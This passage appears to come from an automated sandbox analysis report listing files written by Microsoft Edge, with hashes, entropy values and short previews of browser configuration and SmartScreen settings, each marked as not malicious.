                                                                                                                                                                                                                                                                                              SHA-512:A22F8444AD432480F57E6C88A85AC3E6A39E25283F7EC30B34680A2D4BE1ED1A7838D449FE78188112E8B319C615F11DC32E470E820379AB91C0B49A22AE70B7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEjYN/:/M/xT02zH
                                                                                                                                                                                                                                                                                              MD5:51868FD5FBCEA77322FB69C8F5F4D643
                                                                                                                                                                                                                                                                                              SHA1:F21F01847973F20AC50D20731DDA91832EEB3005
                                                                                                                                                                                                                                                                                              SHA-256:54B2FD7ACFCE814D6EF8A0B8249925C4618FE69AE0308A08663C4EC9036B8A8A
                                                                                                                                                                                                                                                                                              SHA-512:53CA83AD6AC9200496937C879AFC57202F2E1F4F1FCBD17F5BA01CA2F20C51997478F6BB9197F0BDCBF74333780556201DAC45F5EF252458C8CDC961F8160A42
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                              MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                              SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                              SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                              SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:117.0.2045.55
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEjrrXF:/M/xT02zaXF
                                                                                                                                                                                                                                                                                              MD5:5193C55BE2D3F5497D7596B39377876D
                                                                                                                                                                                                                                                                                              SHA1:0A25106CA005623F6E005DEF4567BDC870844F01
                                                                                                                                                                                                                                                                                              SHA-256:415D4415888438A6C56F72A4C195BE3D1C61695CAC5B9416495A653A21FDC1A4
                                                                                                                                                                                                                                                                                              SHA-512:3962E77786E0712C5DB741442FB24402479FE4AE5E6F63F1A9B0D9A764394E9570CF3338F95DF680E0ED1D289AAE7D7BD6FB67430E2116070E4211B532037E84
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
